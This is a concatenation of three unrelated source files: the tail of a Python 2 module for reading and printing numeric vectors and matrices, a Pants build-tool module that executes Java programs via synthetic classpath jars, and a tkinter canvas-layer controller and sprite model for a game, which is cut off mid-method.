		print >> sys.stderr, "pyrcio_m: empty input at line", lno
		sys.exit(1)
	# Tokenize.
	strings = re.split(r"\s+", line)
	if (len(strings) == 1):
		z = float(strings[0])
	else:
		print >> sys.stderr, "pyrcio_m: unrecognizable input at line", lno
		sys.exit(1)
	return z
# ================================================================
def read_complex_column_vector(file_name = "-"):
	"""Read a complex column vector, one scalar per line.

	Reads from stdin when file_name is "-", otherwise from the named
	file.  Exits the process on open failure or empty input.
	Returns a list of complex values.
	"""
	n = 0
	v = []
	lno = 0
	if (file_name == "-"):
		file_handle = sys.stdin
	else:
		try:
			file_handle = open(file_name, 'r')
		except:
			print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
			sys.exit(1)
	# readline() returns "" only at EOF, so this loop consumes every line.
	while (1):
		line = file_handle.readline()
		if (line == ""):
			break
		lno += 1
		v.append(complex_scalar_from_string(line, lno))
		n += 1
	if (file_name != "-"):
		file_handle.close()
	if (n == 0):
		print >> sys.stderr, "pyrcio_m: Empty input."
		sys.exit(1)
	return v
# ----------------------------------------------------------------
def read_real_column_vector(file_name = "-"):
	"""Read a real column vector, one float per line.

	Reads from stdin when file_name is "-", otherwise from the named
	file.  Exits the process on open failure or empty input.
	Returns a list of floats.
	"""
	n = 0
	v = []
	lno = 0
	if (file_name == "-"):
		file_handle = sys.stdin
	else:
		try:
			file_handle = open(file_name, 'r')
		except:
			print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
			sys.exit(1)
	# readline() returns "" only at EOF, so this loop consumes every line.
	while (1):
		line = file_handle.readline()
		if (line == ""):
			break
		lno += 1
		v.append(real_scalar_from_string(line, lno))
		n += 1
	if (file_name != "-"):
		file_handle.close()
	if (n == 0):
		print >> sys.stderr, "pyrcio_m: Empty input."
		sys.exit(1)
	return v
# ----------------------------------------------------------------
def print_complex_column_vector(v):
	"""Print one complex number per line as '%18.11f %18.11f' (real, imag).

	Uses the parenthesized print form, which behaves identically under
	Python 2 and Python 3 for a single argument (the original py2-only
	print statement broke forward compatibility), and iterates directly
	instead of indexing with range(len(v)).
	"""
	for z in v:
		print("%18.11f %18.11f" % (z.real, z.imag))
# ----------------------------------------------------------------
def print_real_column_vector(v):
	"""Print one float per line formatted as '%18.11f'.

	Uses the parenthesized print form, which behaves identically under
	Python 2 and Python 3 for a single argument (the original py2-only
	print statement broke forward compatibility), and iterates directly
	instead of indexing with range(len(v)).
	"""
	for x in v:
		print("%18.11f" % (x))
# ================================================================
def complex_row_vector_from_string(orig_line, lno):
	"""Parse a row of complex numbers from a text line.

	Tokens are whitespace-separated floats taken in (real, imag) pairs;
	an odd token count is fatal.  *lno* is used only in error messages.
	Returns a list of complex values.
	"""
	line = copy.copy(orig_line)
	# Chomp trailing newline, if any (guarded so "" input cannot IndexError).
	if (line.endswith('\n')):
		line = line[0:-1]
	# Strip leading and trailing whitespace.
	line = re.sub(r"^\s+", r"", line)
	line = re.sub(r"\s+$", r"", line)
	if (line == ""):
		sys.stderr.write("pyrcio_m: empty input at line %s\n" % lno)
		sys.exit(1)
	# Tokenize.
	strings = re.split(r"\s+", line)
	if ((len(strings) % 2) == 1):
		sys.stderr.write("pyrcio_m: odd complex input at line %s\n" % lno)
		sys.exit(1)
	# Floor division is required: with the module's
	# `from __future__ import division`, plain '/' yields a float, which
	# is not a valid range() bound.
	ncplx = len(strings) // 2
	v = []
	for i in range(0, ncplx):
		v.append(complex(float(strings[2*i]), float(strings[2*i + 1])))
	return v
# ----------------------------------------------------------------
def real_row_vector_from_string(orig_line, lno):
	"""Parse a row of whitespace-separated floats from a text line.

	*lno* is used only in error messages.  Exits the process on empty
	input.  Returns a list of floats.
	"""
	line = copy.copy(orig_line)
	# Chomp trailing newline, if any (guarded so "" input cannot IndexError).
	if (line.endswith('\n')):
		line = line[0:-1]
	# Strip leading and trailing whitespace.
	line = re.sub(r"^\s+", r"", line)
	line = re.sub(r"\s+$", r"", line)
	if (line == ""):
		sys.stderr.write("pyrcio_m: empty input at line %s\n" % lno)
		sys.exit(1)
	# Tokenize and convert; the original kept a redundant parallel index
	# counter alongside the loop variable.
	strings = re.split(r"\s+", line)
	return [float(s) for s in strings]
# ================================================================
def validate_matrix(A):
	"""Return the column count of matrix A (a list of row lists).

	Exits the process with an error if rows have differing lengths
	(ragged matrix).  Uses the built-in min/max over the row widths
	instead of the original hand-rolled min/max scan.
	"""
	widths = [len(row) for row in A]
	if (min(widths) != max(widths)):
		sys.stderr.write("pyrcio_m: ragged matrix.\n")
		sys.exit(1)
	return max(widths)
# ================================================================
def read_complex_matrix(file_name = "-"):
	"""Read a complex matrix, one row per input line.

	Reads from stdin when file_name is "-", otherwise from the named
	file.  Exits the process on open failure, empty input, or a ragged
	matrix.  Returns a list of row lists of complex values.
	NOTE(review): validating after every appended row is O(rows^2);
	a single validate_matrix(A) call after the loop would suffice.
	"""
	nr = 0
	nc = 0
	A = []
	lno = 0
	if (file_name == "-"):
		file_handle = sys.stdin
	else:
		try:
			file_handle = open(file_name, 'r')
		except:
			print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
			sys.exit(1)
	while (1):
		line = file_handle.readline()
		if (line == ""):
			break
		lno += 1
		A.append(complex_row_vector_from_string(line, lno))
		nr += 1
		nc = validate_matrix(A)
	if (file_name != "-"):
		file_handle.close()
	if ((nr == 0) or (nc == 0)):
		print >> sys.stderr, "pyrcio_m: Empty input."
		sys.exit(1)
	return A
# ----------------------------------------------------------------
def read_real_matrix(file_name = "-"):
	"""Read a real matrix, one row of floats per input line.

	Reads from stdin when file_name is "-", otherwise from the named
	file.  Exits the process on open failure, empty input, or a ragged
	matrix.  Returns a list of row lists of floats.
	"""
	nr = 0
	nc = 0
	A = []
	lno = 0
	if (file_name == "-"):
		file_handle = sys.stdin
	else:
		try:
			file_handle = open(file_name, 'r')
		except:
			print >> sys.stderr, "Couldn't open \"" + file_name + "\" for read."
			sys.exit(1)
	while (1):
		line = file_handle.readline()
		if (line == ""):
			break
		lno += 1
		A.append(real_row_vector_from_string(line, lno))
		nr += 1
	# Validate once after reading all rows: the original called
	# validate_matrix() inside the loop (O(rows^2)) and then issued a
	# second, redundant validate_matrix(A) call before returning.
	if (nr > 0):
		nc = validate_matrix(A)
	if (file_name != "-"):
		file_handle.close()
	if ((nr == 0) or (nc == 0)):
		print >> sys.stderr, "pyrcio_m: Empty input."
		sys.exit(1)
	return A
# ----------------------------------------------------------------
def print_complex_matrix(A):
	"""Print a complex matrix, one row per line, entries as '%11.7f %11.7f'.

	Python 2 only: relies on the trailing-comma print statement to put a
	space between entries and on the bare print for the row-ending newline.
	"""
	nr = len(A)
	nc = len(A[0])
	for i in range(0, nr):
		for j in range(0, nc):
			print "%11.7f %11.7f" % (A[i][j].real, A[i][j].imag),
		print
# ----------------------------------------------------------------
def print_real_matrix(A):
	"""Print a real matrix, one row per line, entries formatted '%11.7f'.

	Python 2 only: relies on the trailing-comma print statement to put a
	space between entries and on the bare print for the row-ending newline.
	"""
	nr = len(A)
	nc = len(A[0])
	for i in range(0, nr):
		for j in range(0, nc):
			print "%11.7f" % (A[i][j]),
		print
|
<reponame>AllClearID/pants
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import sys
import urllib
from zipfile import ZIP_STORED
from pants.base.workunit import WorkUnit, WorkUnitLabel
from pants.java.executor import Executor, SubprocessExecutor
from pants.java.jar.manifest import Manifest
from pants.java.nailgun_executor import NailgunExecutor
from pants.util.contextutil import open_zip, temporary_file
from pants.util.dirutil import safe_concurrent_rename, safe_mkdir, safe_mkdtemp
from pants.util.process_handler import ProcessHandler, SubprocessProcessHandler
logger = logging.getLogger(__name__)
def _get_runner(classpath, main, jvm_options, args, executor,
                cwd, distribution,
                create_synthetic_jar, synthetic_jar_dir):
  """Build the java runner shared by execute_java and execute_java_async."""
  # Fall back to a plain subprocess executor when none was supplied.
  if executor is None:
    executor = SubprocessExecutor(distribution)
  if create_synthetic_jar:
    # Wrap the (possibly very long) classpath in a synthetic manifest-only jar.
    effective_cp = safe_classpath(classpath, synthetic_jar_dir)
    logger.debug('Bundling classpath {} into {}'.format(':'.join(classpath), effective_cp))
  else:
    effective_cp = classpath
  return executor.runner(effective_cp, main, args=args, jvm_options=jvm_options, cwd=cwd)
def execute_java(classpath, main, jvm_options=None, args=None, executor=None,
                 workunit_factory=None, workunit_name=None, workunit_labels=None,
                 cwd=None, workunit_log_config=None, distribution=None,
                 create_synthetic_jar=True, synthetic_jar_dir=None, stdin=None):
  """Executes the java program defined by the classpath and main.
  If `workunit_factory` is supplied, does so in the context of a workunit.
  :param list classpath: the classpath for the java program
  :param string main: the fully qualified class name of the java program's entry point
  :param list jvm_options: an optional sequence of options for the underlying jvm
  :param list args: an optional sequence of args to pass to the java program
  :param executor: an optional java executor to use to launch the program; defaults to a subprocess
                   spawn of the default java distribution
  :param workunit_factory: an optional callable that can produce a workunit context
  :param string workunit_name: an optional name for the work unit; defaults to the main
  :param list workunit_labels: an optional sequence of labels for the work unit
  :param string cwd: optionally set the working directory
  :param WorkUnit.LogConfig workunit_log_config: an optional tuple of options affecting reporting
  :param bool create_synthetic_jar: whether to create a synthentic jar that includes the original
                                    classpath in its manifest.
  :param string synthetic_jar_dir: an optional directory to store the synthetic jar, if `None`
                                   a temporary directory will be provided and cleaned up upon process exit.
  :param file stdin: The stdin handle to use: by default None, meaning that stdin will
                     not be propagated into the process.
  Returns the exit code of the java program.
  Raises `pants.java.Executor.Error` if there was a problem launching java itself.
  """
  # Build the runner once, then delegate running/reporting to execute_runner.
  runner = _get_runner(classpath, main, jvm_options, args, executor, cwd, distribution,
                       create_synthetic_jar, synthetic_jar_dir)
  # Default the reporting name to the java entry point when not supplied.
  workunit_name = workunit_name or main
  return execute_runner(runner,
                        workunit_factory=workunit_factory,
                        workunit_name=workunit_name,
                        workunit_labels=workunit_labels,
                        workunit_log_config=workunit_log_config,
                        stdin=stdin)
def execute_java_async(classpath, main, jvm_options=None, args=None, executor=None,
                       workunit_factory=None, workunit_name=None, workunit_labels=None,
                       cwd=None, workunit_log_config=None, distribution=None,
                       create_synthetic_jar=True, synthetic_jar_dir=None):
  """This is just like execute_java except that it returns a ProcessHandler rather than a return code.
  If `workunit_factory` is supplied, does so in the context of a workunit.
  :param list classpath: the classpath for the java program
  :param string main: the fully qualified class name of the java program's entry point
  :param list jvm_options: an optional sequence of options for the underlying jvm
  :param list args: an optional sequence of args to pass to the java program
  :param executor: an optional java executor to use to launch the program; defaults to a subprocess
                   spawn of the default java distribution
  :param workunit_factory: an optional callable that can produce a workunit context
  :param string workunit_name: an optional name for the work unit; defaults to the main
  :param list workunit_labels: an optional sequence of labels for the work unit
  :param string cwd: optionally set the working directory
  :param WorkUnit.LogConfig workunit_log_config: an optional tuple of options affecting reporting
  :param bool create_synthetic_jar: whether to create a synthentic jar that includes the original
                                    classpath in its manifest.
  :param string synthetic_jar_dir: an optional directory to store the synthetic jar, if `None`
                                   a temporary directory will be provided and cleaned up upon process exit.
  Returns a ProcessHandler to the java program.
  Raises `pants.java.Executor.Error` if there was a problem launching java itself.
  """
  # Build the runner once, then delegate spawning/reporting to execute_runner_async.
  runner = _get_runner(classpath, main, jvm_options, args, executor, cwd, distribution,
                       create_synthetic_jar, synthetic_jar_dir)
  # Default the reporting name to the java entry point when not supplied.
  workunit_name = workunit_name or main
  return execute_runner_async(runner,
                              workunit_factory=workunit_factory,
                              workunit_name=workunit_name,
                              workunit_labels=workunit_labels,
                              workunit_log_config=workunit_log_config)
def execute_runner(runner, workunit_factory=None, workunit_name=None, workunit_labels=None,
                   workunit_log_config=None, stdin=None):
  """Executes the given java runner.
  If `workunit_factory` is supplied, does so in the context of a workunit.
  :param runner: the java runner to run
  :param workunit_factory: an optional callable that can produce a workunit context
  :param string workunit_name: an optional name for the work unit; defaults to the main
  :param list workunit_labels: an optional sequence of labels for the work unit
  :param WorkUnit.LogConfig workunit_log_config: an optional tuple of task options affecting reporting
  :param file stdin: The stdin handle to use: by default None, meaning that stdin will
                     not be propagated into the process.
  Returns the exit code of the java runner.
  Raises `pants.java.Executor.Error` if there was a problem launching java itself.
  """
  if not isinstance(runner, Executor.Runner):
    raise ValueError('The runner argument must be a java Executor.Runner instance, '
                     'given {} of type {}'.format(runner, type(runner)))
  if workunit_factory is None:
    # No reporting requested: run directly and return the exit code.
    return runner.run(stdin=stdin)
  else:
    # Label the workunit as a JVM tool invocation (nailgun vs plain JVM).
    workunit_labels = [
      WorkUnitLabel.TOOL,
      WorkUnitLabel.NAILGUN if isinstance(runner.executor, NailgunExecutor) else WorkUnitLabel.JVM
    ] + (workunit_labels or [])
    with workunit_factory(name=workunit_name, labels=workunit_labels,
                          cmd=runner.cmd, log_config=workunit_log_config) as workunit:
      ret = runner.run(stdout=workunit.output('stdout'),
                       stderr=workunit.output('stderr'),
                       stdin=stdin)
      # Any non-zero java exit code marks the workunit as failed.
      workunit.set_outcome(WorkUnit.FAILURE if ret else WorkUnit.SUCCESS)
      return ret
def execute_runner_async(runner, workunit_factory=None, workunit_name=None, workunit_labels=None,
                         workunit_log_config=None):
  """Executes the given java runner asynchronously.
  We can't use 'with' here because the workunit_generator's __exit__ function
  must be called after the process exits, in the return_code_handler.
  The wrapper around process.wait() needs to handle the same exceptions
  as the contextmanager does, so we have code duplication.
  We're basically faking the 'with' call to deal with asynchronous
  results.
  If `workunit_factory` is supplied, does so in the context of a workunit.
  :param runner: the java runner to run
  :param workunit_factory: an optional callable that can produce a workunit context
  :param string workunit_name: an optional name for the work unit; defaults to the main
  :param list workunit_labels: an optional sequence of labels for the work unit
  :param WorkUnit.LogConfig workunit_log_config: an optional tuple of task options affecting reporting
  Returns a ProcessHandler to the java process that is spawned.
  Raises `pants.java.Executor.Error` if there was a problem launching java itself.
  """
  if not isinstance(runner, Executor.Runner):
    raise ValueError('The runner argument must be a java Executor.Runner instance, '
                     'given {} of type {}'.format(runner, type(runner)))
  if workunit_factory is None:
    # No reporting requested: spawn directly and wrap in a plain handler.
    return SubprocessProcessHandler(runner.spawn())
  else:
    # Label the workunit as a JVM tool invocation (nailgun vs plain JVM).
    workunit_labels = [
      WorkUnitLabel.TOOL,
      WorkUnitLabel.NAILGUN if isinstance(runner.executor, NailgunExecutor) else WorkUnitLabel.JVM
    ] + (workunit_labels or [])
    # Manually drive the context manager: __enter__ now, __exit__ when the
    # caller waits on the returned handler (or when an exception escapes).
    workunit_generator = workunit_factory(name=workunit_name, labels=workunit_labels,
                                          cmd=runner.cmd, log_config=workunit_log_config)
    workunit = workunit_generator.__enter__()
    process = runner.spawn(stdout=workunit.output('stdout'), stderr=workunit.output('stderr'))
    class WorkUnitProcessHandler(ProcessHandler):
      # `_` stands in for `self` throughout; these methods delegate to the
      # spawned process captured from the enclosing scope.
      def wait(_, timeout=None):
        try:
          ret = process.wait(timeout=timeout)
          workunit.set_outcome(WorkUnit.FAILURE if ret else WorkUnit.SUCCESS)
          workunit_generator.__exit__(None, None, None)
          return ret
        except BaseException:
          if not workunit_generator.__exit__(*sys.exc_info()):
            raise
          # NOTE(review): when __exit__ suppresses the exception, wait()
          # implicitly returns None rather than an exit code — confirm
          # callers tolerate that.
      def kill(_):
        return process.kill()
      def terminate(_):
        return process.terminate()
      def poll(_):
        return process.poll()
    return WorkUnitProcessHandler()
def relativize_classpath(classpath, root_dir, followlinks=True):
  """Convert a classpath into entries relative to a directory.

  The result is eventually used by a jar file located in `root_dir` as its
  manifest attribute Class-Path. See
  https://docs.oracle.com/javase/7/docs/technotes/guides/extensions/spec.html#bundled

  :param list classpath: Classpath to be relativized.
  :param string root_dir: directory to relativize urls in the classpath, does not
    have to exist yet.
  :param bool followlinks: whether to follow symlinks to calculate relative path.
  :returns: Converted classpath of the same size as input classpath.
  :rtype: list of strings
  """
  # When symlinks are involved, root_dir concatenated with a relpath computed
  # from the symlinked forms may not exist.  E.g. on mac `/var` is a symlink to
  # `/private/var`, and relative paths of its subdirectories to other
  # directories under `/` computed by os.path.relpath miss one level of `..`.
  # Resolving both ends with os.path.realpath guarantees the returned relpath
  # can always be located.  (Not needed only when all paths are relative.)
  base = os.path.realpath(root_dir) if followlinks else root_dir

  def _manifest_entry(entry):
    resolved = os.path.realpath(entry) if followlinks else entry
    rel = os.path.relpath(resolved, base)
    # Directories carry a trailing '/'; everything else is assumed to be a jar.
    # os.path.isdir follows symlinks, which is exactly what we need here.
    return rel + '/' if os.path.isdir(resolved) else rel

  return [_manifest_entry(entry) for entry in classpath]
# VisibleForTesting
def safe_classpath(classpath, synthetic_jar_dir, custom_name=None):
  """Bundles classpath into one synthetic jar that includes original classpath in its manifest.

  This is to ensure classpath length never exceeds platform ARG_MAX.

  :param list classpath: Classpath to be bundled.
  :param string synthetic_jar_dir: directory to store the synthetic jar, if `None`
    a temp directory will be provided and cleaned up upon process exit. Otherwise synthetic
    jar will remain in the supplied directory, only for debugging purpose.
  :param custom_name: filename of the synthetic jar to be created.
  :returns: A classpath (singleton list with just the synthetic jar).
  :rtype: list of strings
  """
  if synthetic_jar_dir:
    safe_mkdir(synthetic_jar_dir)
  else:
    synthetic_jar_dir = safe_mkdtemp()

  # Quote the paths so that if they contain reserved characters can be safely passed to JVM classloader.
  # NOTE(review): `urllib.quote` is the Python 2 location of this function; under
  # Python 3 this would need `urllib.parse.quote` — confirm which interpreter
  # runs this module before touching it.
  bundled_classpath = map(urllib.quote, relativize_classpath(classpath, synthetic_jar_dir))

  manifest = Manifest()
  manifest.addentry(Manifest.CLASS_PATH, ' '.join(bundled_classpath))

  # Write the manifest into a fresh jar (ZIP_STORED: no point compressing a
  # manifest-only jar), then optionally rename it to the caller-provided name.
  with temporary_file(root_dir=synthetic_jar_dir, cleanup=False, suffix='.jar') as jar_file:
    with open_zip(jar_file, mode='w', compression=ZIP_STORED) as jar:
      jar.writestr(Manifest.PATH, manifest.contents())
    if custom_name:
      custom_path = os.path.join(synthetic_jar_dir, custom_name)
      safe_concurrent_rename(jar_file.name, custom_path)
      return [custom_path]
    else:
      return [jar_file.name]
|
import tkinter as tk
import multiprocessing as mp
import os
import sys
import json
import threading
import time
import random
import math
class CanvasController:
    """Wrapper around a tk.Canvas that adds named render layers.

    Objects are created through the ``create_*`` wrappers, which accept an
    extra ``layer`` keyword (an int, or a string looked up in the layer config
    JSON).  The controller tracks objects per layer and restacks new objects
    so higher-numbered layers always render above lower-numbered ones.
    """
    def __init__(self, canvas, game = None, layers = None, get_pil = False):
        self.canvas = canvas
        self.game = game
        # Pass-throughs straight to the underlying tk canvas.
        self.winfo_width = self.canvas.winfo_width
        self.winfo_height = self.canvas.winfo_height
        self.find_overlapping = self.canvas.find_overlapping
        self.config = self.canvas.config
        self.bind = self.canvas.bind
        self.unbind = self.canvas.unbind
        self.unbind_all = self.canvas.unbind_all
        # Reference timestamp used by Models to synchronise animations.
        self.global_time = 0
        # Namespace of lazily-imported PIL entry points (all None when PIL
        # support wasn't requested via get_pil).
        class pillow:
            image = None
            image_chops = None
            photoimage = None
            gifimage = None
        self.pillow = pillow
        if get_pil:
            # Import PIL on demand so the controller still works without it.
            self.pillow.image = __import__('PIL.Image').Image
            self.pillow.image_chops = __import__('PIL.ImageChops').ImageChops
            self.pillow.photoimage = __import__('PIL.ImageTk').ImageTk.PhotoImage
            self.pillow.gifimage = __import__('PIL.GifImagePlugin').GifImagePlugin.GifImageFile
        if layers is None:
            layers = ['user', 'layers.json']
        self.layers = []
        # kwargs consumed by this controller instead of being passed on to tk.
        self.reserved_args = ['layer']
        with open(os.path.join(sys.path[0], *layers), 'r') as file:
            self.layer_config = json.load(file) #load user defined order for screen items to be rendered in
        self.reset_time()
    def create_rectangle(self, *coords, **args):
        'Wrapper function to provide tk canvas-like syntax'
        return self._create('rectangle', coords, args)
    def create_image(self, *coords, **args):
        'Wrapper function to provide tk canvas-like syntax'
        return self._create('image', coords, args)
    def create_text(self, *coords, **args):
        'Wrapper function to provide tk canvas-like syntax'
        return self._create('text', coords, args)
    def create_window(self, *coords, **args):
        'Wrapper function to provide tk canvas-like syntax'
        return self._create('window', coords, args)
    def create_line(self, *coords, **args):
        'Wrapper function to provide tk canvas-like syntax'
        return self._create('line', coords, args)
    def _create(self, obj_type, coords, args):
        'Create a canvas object of obj_type and slot it into its render layer.'
        if not 'layer' in args:
            args['layer'] = 0
        if type(args['layer']) == str: #layer is string, use lookup table
            if args['layer'] in self.layer_config:
                args['layer'] = self.layer_config[args['layer']]
            else:
                raise ValueError('Couldn\'t find layer name "{}" in config'.format(args['layer'])) #layer not in lookup table
        while not len(self.layers) >= args['layer'] + 1:
            self.layers.append([]) #make layer if it doesn't exist
        filtered_args = {} #remove arguments that are reserved for controller (layer etc) and pass the rest on to the canvas
        for key in args:
            if not key in self.reserved_args:
                filtered_args[key] = args[key]
        if obj_type == 'image': #call relevant canvas function
            obj = self.canvas.create_image(*coords, **filtered_args)
        elif obj_type == 'text':
            obj = self.canvas.create_text(*coords, **filtered_args)
        elif obj_type == 'window':
            obj = self.canvas.create_window(*coords, **filtered_args)
        elif obj_type == 'line':
            obj = self.canvas.create_line(*coords, **filtered_args)
        else:
            obj = self.canvas.create_rectangle(*coords, **filtered_args)
        self.layers[args['layer']].append({'object': obj})
        ## objects are always created on the top of their layer
        # NOTE(review): the restack logic below is hard to verify from here —
        # the intent is "lower the new object just below the lowest occupied
        # layer above its own"; confirm the fallback branches against the
        # game's rendering before changing anything.
        if not len(self.layers) == args['layer'] + 1: ## logic to find next highest tag and move just below it
            next_layer = None
            # Walk top-down; ends with the lowest occupied layer above ours.
            for i in range(len(self.layers) - 1, args['layer'], -1):
                if not len(self.layers[i]) == 0:
                    next_layer = i
            if next_layer is None:
                if len(self.layers) == 1:
                    lower_to = None
                    for i in range(args['layer']):
                        if not len(self.layers[i]) == 0:
                            lower_to = self.layers[i][len(self.layers[args['layer']]) - 1]
                    if not lower_to is None:
                        self.canvas.tag_lower(obj, lower_to['object'])
                else:
                    self.canvas.tag_lower(obj, self.layers[args['layer']][len(self.layers[args['layer']]) - 2]['object'])
            else:
                self.canvas.tag_lower(obj, self.layers[next_layer][0]['object'])
        return obj
    def delete(self, obj):
        'Delete item from canvas'
        to_remove = []
        for a in range(len(self.layers)):
            for b in range(len(self.layers[a])):
                if self.layers[a][b]['object'] == obj:
                    to_remove.append([a, b])
        self.canvas.delete(obj)
        # Pop from the end first so earlier indexes stay valid.
        to_remove.reverse()
        for a, b in to_remove:
            self.layers[a].pop(b)
    def coords(self, obj, *coords):
        'Set the coordinates of something on the canvas'
        self.canvas.coords(obj, *coords)
    def itemconfigure(self, obj, **args):
        'Configure an item on the canvas'
        self.canvas.itemconfigure(obj, **args)
    def reset_time(self):
        'Reset the shared animation clock to the current wall time.'
        self.set_time(time.time())
    def set_time(self, value):
        'Set the shared animation clock to an explicit timestamp.'
        self.global_time = value
class Model:
    '''
    Model:
    Similar in function to canvas.create_image

    canvas_controller - CanvasController object to render to
    mdl_name - name of model in map files
    map_path - path to map files
    layer - string or int for canvas controller
    autoplay_anims - start the background animation thread on construction

    Pre-renders every (frame, layer, rotation, transparency) combination of
    the model's textures as canvas objects parked offscreen, then "moves"
    between states by swapping which objects are onscreen.
    '''
    def __init__(self, canvas_controller, mdl_name, map_path, layer, autoplay_anims = True):
        self.mdl_name = mdl_name
        self.map_path = map_path
        self.canvas_controller = canvas_controller
        self.layer = layer
        ## make data structures
        class attributes:
            profile = None #e.g. idle
            profiles = {}
            profile_ranks = []
            class pos: #current coordinates
                x = 0
                y = 0
            rotation = 0 #current rotation (0-359)
            transparency = 0 #current transparency (0-255)
            interps_per_second = 0
            render_quality = 0 #0-3 - render quality as defined in the user's config
            uses_PIL = False
            force_grid = None #none means don't force, boolean will force to that value
            class anim_controller:
                playing_onetime = False
                revert_to = None
                sync = False
                revert_frame = None
                onetime_start = None
                frame = 0
                run_loop = False
            class snap:
                x = 1
                y = 1
            running = True
        self.attributes = attributes
        class cfgs:
            model = {}
            user = {}
            map = {}
        self.cfgs = cfgs
        class _set_queue_output:
            ticket = 0
            outputs = {}
        self._set_queue_output = _set_queue_output
        ## load data into structures
        #load configs
        with open(os.path.join(self.map_path, 'models', self.mdl_name, 'list.json'), 'r') as file:
            self.cfgs.model = json.load(file)
        with open(os.path.join(sys.path[0], 'user', 'config.json'), 'r') as file:
            self.cfgs.user = json.load(file)
        with open(os.path.join(self.map_path, 'list.json'), 'r') as file:
            self.cfgs.map = json.load(file)
        self.pillow = self.canvas_controller.pillow
        self.attributes.profile_ranks = self.cfgs.model['ranks']
        self.attributes.profile = self.cfgs.model['default']
        self.attributes.uses_PIL = self.cfgs.user['graphics']['PILrender']
        self.attributes.render_quality = self.cfgs.user['graphics']['model quality']
        self.attributes.interps_per_second = self.cfgs.user['network']['interpolations per second']
        self.attributes.snap.x = self.cfgs.map['grid']['mult']['x']
        self.attributes.snap.y = self.cfgs.map['grid']['mult']['y']
        if self.cfgs.map['grid']['force']:
            self.attributes.force_grid = self.cfgs.map['grid']['force value']
        ### Load profile data
        for name in self.cfgs.model['profiles']:
            self.attributes.profiles[name] = MdlProfile(self, self.cfgs.model['profiles'][name])
        # Park the model at the default profile's offscreen position.
        self.attributes.pos.x = self.attributes.profiles[self.attributes.profile].offscreen.x
        self.attributes.pos.y = self.attributes.profiles[self.attributes.profile].offscreen.y
        ## start animation player if necessary
        if autoplay_anims:
            self.start_anims()
        ## call set
        self.set(force = True)
    def increment(self, x = None, y = None, rotation = None, transparency = None, frame = None, force = False):
        'Apply relative deltas to the current state and delegate to set().'
        if x is not None:
            x += self.attributes.pos.x
        if y is not None:
            y += self.attributes.pos.y
        if rotation is not None:
            rotation += self.attributes.rotation
        if transparency is not None:
            transparency += self.attributes.transparency
        if frame is not None:
            # Wrap the frame index around the current profile's frame count.
            frame = (frame + self.attributes.anim_controller.frame) % self.attributes.profiles[self.attributes.profile].animation.frames
        self.set(x, y, rotation, transparency, frame, force)
    def set(self, x = None, y = None, rotation = None, transparency = None, frame = None, force = False, image_set = None):
        '''Set the model's absolute state and update the canvas.

        Records the previous state, applies the requested changes, works out
        which visible "fields" actually changed (after snapping/quantisation),
        and swaps/moves the pre-rendered canvas objects accordingly.
        '''
        prev_image_set = self.attributes.profile
        if image_set is not None:
            self.attributes.profile = image_set
        prev_x = self.attributes.pos.x
        if x is not None:
            self.attributes.pos.x = x
        prev_y = self.attributes.pos.y
        if y is not None:
            self.attributes.pos.y = y
        prev_rotation = self.attributes.rotation
        if rotation is not None:
            self.attributes.rotation = rotation
        prev_transparency = self.attributes.transparency
        if transparency is not None:
            self.attributes.transparency = transparency
        prev_frame = self.attributes.anim_controller.frame
        if frame is not None:
            self.attributes.anim_controller.frame = frame
        #check if the function has been called with any arguments at all
        # NOTE(review): image_set is not part of this early-return check, so a
        # call passing only image_set switches the profile attribute without
        # updating the canvas — confirm whether that is intended.
        if x is None and y is None and rotation is None and transparency is None and frame is None and not force:
            return None
        #find what fields were changed
        if force:
            fields_changed = ['x', 'y', 'image set', 'rotation', 'transparency', 'frame']
        else:
            fields_changed = []
            if (prev_image_set is None and image_set is not None) or self.attributes.profile != prev_image_set:
                fields_changed.append('image set')
            # x/y only count as changed if their snapped grid cell changed.
            if (prev_x is None and x is not None) or self.snap_coords(self.attributes.pos.x, 0)[0] != self.snap_coords(prev_x, 0)[0]:
                fields_changed.append('x')
            if (prev_y is None and y is not None) or self.snap_coords(0, self.attributes.pos.y)[1] != self.snap_coords(0, prev_y)[1]:
                fields_changed.append('y')
            # rotation/transparency count as changed only if their quantised
            # (render-quality-dependent) values changed.
            if (prev_rotation is None and rotation is not None) or self.attributes.profiles[self.attributes.profile].squash_rotation(self.attributes.rotation) != self.attributes.profiles[self.attributes.profile].squash_rotation(prev_rotation):
                fields_changed.append('rotation')
            if (prev_transparency is None and transparency is not None) or self.attributes.profiles[self.attributes.profile].squash_transparency(self.attributes.transparency) != self.attributes.profiles[self.attributes.profile].squash_transparency(prev_transparency):
                fields_changed.append('transparency')
            if prev_frame is None or self.attributes.anim_controller.frame != prev_frame:
                fields_changed.append('frame')
        #check if only the positions were changed
        if len(fields_changed) > 0: #make sure at least one field was changed
            if False in [key in ['x', 'y'] for key in fields_changed]:
                # Something other than position changed: a different set of
                # pre-rendered objects must become visible.
                #move currently onscreen objects offscreen
                self.attributes.profiles[prev_image_set].set_offscreen(prev_frame, prev_rotation, prev_transparency)
            #move currently offscreen objects onscreen
            self.attributes.profiles[self.attributes.profile].setpos(self.attributes.pos.x, self.attributes.pos.y, self.attributes.anim_controller.frame, self.attributes.rotation, self.attributes.transparency)
    def get_object(self, profile, frame, layer, rotation, transparency):
        'Return the canvas object id for the given state combination.'
        return self.attributes.profiles[profile].get_obj(frame, layer, rotation, transparency)
    def destroy(self):
        'Hide the model, delete all its canvas objects and stop its threads.'
        current_profile = self.attributes.profiles[self.attributes.profile]
        current_profile.set_offscreen(self.attributes.anim_controller.frame, self.attributes.rotation, self.attributes.transparency)
        for profile_name in self.attributes.profiles:
            self.attributes.profiles[profile_name].destroy()
        self.attributes.anim_controller.run_loop = False
        self.attributes.running = False
    def _anim_player(self):
        'Background loop advancing frames; runs on its own daemon thread.'
        # If the profile wants synchronised playback, sleep until the next
        # whole-animation boundary relative to the controller's global clock.
        if self.attributes.profiles[self.attributes.profile].animation.sync:
